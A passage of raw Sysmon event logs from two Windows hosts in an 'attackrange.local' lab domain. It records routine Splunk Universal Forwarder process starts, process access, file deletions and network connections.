Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F5C4-60EB-617D-00000000CF01}5284C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050518Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:52.817{466BC892-F5C4-60EB-617D-00000000CF01}5284C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001050517Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:52.463{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C4426644BBC5AC52A46364CBE33C1962,SHA256=61C2283EECCBA3BA8096CF5A91153905E6E0D5D9071266B0E7C7233D18C779F3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050516Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:52.147{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F5C4-60EB-607D-00000000CF01}9828C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050515Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:52.132{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050514Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:52.132{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050513Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:52.132{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050512Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:52.132{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050511Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:52.132{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F5C4-60EB-607D-00000000CF01}9828C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050510Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:52.132{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F5C4-60EB-607D-00000000CF01}9828C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050509Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:52.133{466BC892-F5C4-60EB-607D-00000000CF01}9828C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001050508Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:52.018{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F2097F739BECB03DEEAA56168C2C55B3,SHA256=A1BD38C12F2C30199D3D95BC63553935C44F68B20D19CAF4824AA1236388B355,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000808406Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:53.507{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=062E479E6672D75B93614143C311DCCE,SHA256=DD5E7CA8FDA85E1E071DC42DE7CF7A5A8C759AF5A5667BACB020B952BB2FB47B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050538Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:53.816{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=14917E337FF3553F603AEB53BCE012E2,SHA256=E0342D4AA821B6CC11731AF146DB9E7D51B1BEE99C1DA2EBC190ECE215E9CA35,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050537Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:53.748{466BC892-F5C5-60EB-627D-00000000CF01}53365944C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050536Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:53.516{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F5C5-60EB-627D-00000000CF01}5336C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050535Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:53.501{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050534Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:53.501{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050533Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:53.501{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050532Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:53.501{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050531Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:53.501{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F5C5-60EB-627D-00000000CF01}5336C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050530Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:53.501{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F5C5-60EB-627D-00000000CF01}5336C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050529Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:53.501{466BC892-F5C5-60EB-627D-00000000CF01}5336C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001050528Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:53.047{466BC892-F5C4-60EB-617D-00000000CF01}52842492C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001050527Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:53.047{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=245F906A9FFDFE0419A6DD42628284B4,SHA256=2E196ED680C78E759AC89717B004C49DC0AB4594FA7BF60A97DD64D4EBE127CD,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808405Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:51.358{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57324-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808407Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:54.528{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=469B2D91BF8C3E11B65A0441B799208A,SHA256=4E9A6F8E6E362055030F2BEEFEEEB34C5FE3B1E0A9176F94F6DDD167657BA5AD,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050549Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:46.754{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT 
AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51090-false10.0.1.12-8000- 354300x80000000000000001050548Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:46.500{466BC892-02AF-60E8-1000-00000000CF01}432C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.14win-dc-890.attackrange.local123ntpfalse20.101.57.9-123ntp 10341000x80000000000000001050547Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:54.200{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F5C6-60EB-637D-00000000CF01}8948C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050546Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:54.200{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050545Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:54.200{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050544Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 